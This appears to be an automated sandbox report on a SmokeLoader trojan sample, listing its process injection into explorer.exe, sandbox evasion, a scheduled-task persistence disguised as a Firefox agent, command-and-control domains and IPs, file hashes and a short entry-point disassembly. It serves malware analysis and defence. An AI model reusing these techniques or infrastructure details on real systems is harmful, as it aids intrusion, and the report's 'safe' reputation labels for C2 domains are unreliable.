Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (12) | Cached Domain Credentials | Virtualization/Sandbox Evasion (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (512) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories (1) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Indicator Removal (1) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Legend (node and edge icons of the behavior graph image, which is not reproduced here): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet
Behavior Graph ID: 1571560 | Sample: e6reA52T4I.exe | Startdate: 09/12/2024 | Architecture: WINDOWS | Score: 100

Root (node 2)
    DNS: host-file-host6.com
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
    started: e6reA52T4I.exe (node 8); hdeufvw (node 11)

e6reA52T4I.exe (node 8)
    Signatures: Detected unpacking (changes PE section rights); Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
    started: e6reA52T4I.exe (node 13)

hdeufvw (node 11)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    started: hdeufvw (node 16)

e6reA52T4I.exe (node 13)
    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process
    injected: explorer.exe (node 18; graph counters 38 and 3)

hdeufvw (node 16)
    Signatures: Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)

explorer.exe (node 18, injected)
    Network: host-file-host6.com 188.40.141.211, 49705, 80 (HETZNER-ASDE, Germany)
    Dropped: C:\Users\user\AppData\Roaming\hdeufvw (PE32); C:\Users\user\...\hdeufvw:Zone.Identifier (ASCII)
    Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
e6reA52T4I.exe | 88% | ReversingLabs | Win32.Trojan.SmokeLoader
e6reA52T4I.exe | 100% | Avira | HEUR/AGEN.1312455
e6reA52T4I.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\hdeufvw | 100% | Avira | HEUR/AGEN.1312455
C:\Users\user\AppData\Roaming\hdeufvw | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\hdeufvw | 82% | ReversingLabs | Win32.Trojan.SmokeLoader

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | 0% | Avira URL Cloud | safe
http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
http://lrvsgmets.com/ings#U | 0% | Avira URL Cloud | safe
http://lrvsgmets.com/ | 0% | Avira URL Cloud | safe
http://iwtkhvgidl.com/ | 0% | Avira URL Cloud | safe
http://ubpctscp.net/ | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
host-file-host6.com | 188.40.141.211 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://host-host-file8.com/ | false | | high
http://host-file-host6.com/ | false | | high

The Malicious and Reputation columns are reputation-feed verdicts and do not override the behavioral evidence above: host-file-host6.com (188.40.141.211) is the host the injected explorer.exe connected to on port 80, and that traffic is what raised the Suricata alert.
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact- | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://wns.windows.com/bat | explorer.exe, 00000003.00000002.2729091529.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567932050.0000000009730000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725120474.0000000002FAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160909018.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three- | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | explorer.exe, 00000003.00000002.2727383323.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2724814325.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2727361366.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in- | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://word.office.com576 | explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail- | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin | explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://host-file-host6.com/tingsTU; | explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://lrvsgmets.com/ings#U | explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w | explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.comE | explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                  high
                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000003.2159452142.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/aexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://powerpoint.office.comcemberZexplorer.exe, 00000003.00000000.1569386783.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159155796.000000000D0B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://lrvsgmets.com/explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://ubpctscp.net/explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://api.msn.com/Xexplorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.msn.com/$explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://iwtkhvgidl.com/explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://outlook.comNaP0Bexplorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
Contacted IPs:
IP: 188.40.141.211
Domain: host-file-host6.com
Country: Germany
ASN: 24940
ASN Name: HETZNER-ASDE
Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571560
Start date and time: 2024-12-09 14:52:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: e6reA52T4I.exe
renamed because original name is a hash value
Original Sample Name: b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@6/2@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 50
• Number of non-executed functions: 41
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: e6reA52T4I.exe
Timeline (Time / Type / Description):

Time: 08:53:34
Type: API Interceptor
Description: 780x Sleep call for process: explorer.exe modified

Time: 14:53:52
Type: Task Scheduler
Description: Run new task: Firefox Default Browser Agent 09AD43FFE108D801 path: C:\Users\user\AppData\Roaming\hdeufvw
IP context (Match / Associated Sample Name / Detection / Threat Name / Context):

Match: 188.40.141.211

Associated Sample Name / URL: w4DO1Z18yg.wsf
Detection: malicious
Threat Name: SmokeLoader
Context: ceoconstractionstore.pl/index.php

Associated Sample Name / URL: UkHkCa3IYV.wsf
Detection: malicious
Threat Name: SmokeLoader
Context: ceoconstractionstore.pl/index.php

Associated Sample Name / URL: 3312.PDF.wsf
Detection: malicious
Threat Name: SmokeLoader
Context: ceoconstractionstore.pl/index.php

Associated Sample Name / URL: RmbF3635xY.exe
Detection: malicious
Threat Name: SmokeLoader
Context: ceoconstractionstore.pl/index.php

Associated Sample Name / URL: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
Detection: malicious
Threat Name: CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger
Context: gmpeople.com/upload/

Associated Sample Name / URL: vwaoMjcyAw.exe
Detection: malicious
Threat Name: SmokeLoader
Context: selebration17io.io/index.php

Associated Sample Name / URL: Qi4Mj8hG3t.exe
Detection: malicious
Threat Name: SmokeLoader
Context: selebration17io.io/index.php

Associated Sample Name / URL: br0A8E2X6I.exe
Detection: malicious
Threat Name: SmokeLoader
Context: selebration17io.io/index.php

Associated Sample Name / URL: setup.exe
Detection: malicious
Threat Name: Babuk, Djvu
Context: zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true

Associated Sample Name / URL: SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe
Detection: malicious
Threat Name: SmokeLoader
Context: agressivemnaiq.xyz/
Domain context (Match / Associated Sample Name / Detection / Threat Name / Context):

Match: host-file-host6.com

Associated Sample Name / URL: aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe
Detection: malicious
Threat Name: Bdaejec, SmokeLoader
Context: 188.40.141.211

Associated Sample Name / URL: 461f0f86f52bfa5fbed84023d0a9c8652bcbca34fea76ad0cb5bb8c503b65c9a_dump.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 172.67.172.189

Associated Sample Name / URL: tWuTbYx8n1.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: toolspub2.exe
Detection: malicious
Threat Name: LummaC, Djvu, PureLog Stealer, SmokeLoader, zgRAT
Context: 172.67.172.189

Associated Sample Name / URL: O2O2kYZgiH.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: file.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: toolspub1.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: toolspub2(1).exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: OE83kvJ3ZA.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102

Associated Sample Name / URL: kM2Y1cFSAJ.exe
Detection: malicious
Threat Name: SmokeLoader
Context: 104.21.30.102
ASN context (Match / Associated Sample Name / Detection / Threat Name / Context):

Match: HETZNER-ASDE

Associated Sample Name / URL: x.ps1
Detection: malicious
Threat Name: PureLog Stealer, Quasar
Context: 178.63.102.185

Associated Sample Name / URL: 32%20VPN.exe
Detection: malicious
Threat Name: AsyncRAT
Context: 136.243.179.5

Associated Sample Name / URL: 222.exe
Detection: malicious
Threat Name: Njrat
Context: 136.243.179.5

Associated Sample Name / URL: 600%202024.exe
Detection: malicious
Threat Name: PureLog Stealer
Context: 178.63.102.185

Associated Sample Name / URL: xhost.vbs
Detection: malicious
Threat Name: Unknown
Context: 136.243.179.5

Associated Sample Name / URL: 800.vbs
Detection: malicious
Threat Name: Unknown
Context: 136.243.179.5

Associated Sample Name / URL: jew.x86.elf
Detection: malicious
Threat Name: Unknown
Context: 94.130.241.86

Associated Sample Name / URL: .main.elf
Detection: malicious
Threat Name: Xmrig
Context: 5.75.186.53

Associated Sample Name / URL: .report_system.elf
Detection: malicious
Threat Name: Xmrig
Context: 5.75.186.53

Associated Sample Name / URL: meerkat.x86.elf
Detection: malicious
Threat Name: Mirai
Context: 49.13.51.167
No context
No context
Dropped file:
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 212992
Entropy (8bit): 6.801627513912703
Encrypted: false
SSDEEP: 3072:VCx58iqLwhMYM3NTveoygYFQAuOFBiSY6+3:2qUuYMdTeoVxJs1
MD5: 855E7CD7024D340B83123C75D9D4FB1C
SHA1: 3323FDCD6CE66E3C1B971B098F26A562892B8C30
SHA-256: B05425661616539E0E68493474745880F03300D9B5CCA894AF732DA010869778
SHA-512: BB34F61CC051C37206D53C6CDF8F198497B9B8FB5A78B7C00B21FD4EC077156F99B96C6D236CDA7152376D54D8948316F02D4269A5C00047CC1D9937540916E0
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....wc.....................^9......|............@...........................;.....R...........................................d....`;.hf...........................................................A..@............................................text...(........................... ..`.data...H.8......H..................@....rsrc...hf...`;..h..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
Dropped file:
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0
Static file info:
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.801627513912703
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Clipper DOS Executable (2020/12) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: e6reA52T4I.exe
File size: 212'992 bytes
MD5: 855e7cd7024d340b83123c75d9d4fb1c
SHA1: 3323fdcd6ce66e3c1b971b098f26a562892b8c30
SHA256: b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778
SHA512: bb34f61cc051c37206d53c6cdf8f198497b9b8fb5a78b7c00b21fd4ec077156f99b96c6d236cda7152376d54d8948316f02d4269a5c00047cc1d9937540916e0
SSDEEP: 3072:VCx58iqLwhMYM3NTveoygYFQAuOFBiSY6+3:2qUuYMdTeoVxJs1
TLSH: 2524BE2263E1D072E2274630CE66C1B56B2BB8614FB1A6DB33C45A7F4E315E1C67532E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....wc...................
Icon Hash: 4559818250554549
Entrypoint: 0x407c9a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6377D1FE [Fri Nov 18 18:42:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3cf8645c93eebd6a8066c6479eebf80f
Instruction
call 00007FA7A8EF6556h
jmp 00007FA7A8EF1AFEh
push dword ptr [0042F104h]
call dword ptr [00401110h]
test eax, eax
je 00007FA7A8EF1C74h
call eax
push 00000019h
call 00007FA7A8EF54FDh
push 00000001h
push 00000000h
call 00007FA7A8EF3A78h
add esp, 0Ch
jmp 00007FA7A8EF3A3Dh
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FA7A8EF1C96h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FA7A8EF1CC0h
test ecx, 00000003h
jne 00007FA7A8EF1C61h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007FA7A8EF1C5Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007FA7A8EF1CA4h
test ah, ah
je 00007FA7A8EF1C96h
test eax, 00FF0000h
je 00007FA7A8EF1C85h
test eax, FF000000h
je 00007FA7A8EF1C74h
jmp 00007FA7A8EF1C3Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
int3
int3
int3
int3
int3
push ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x28e08 | 0x64 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b6000 | 0x6668 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x41e0 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x200 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
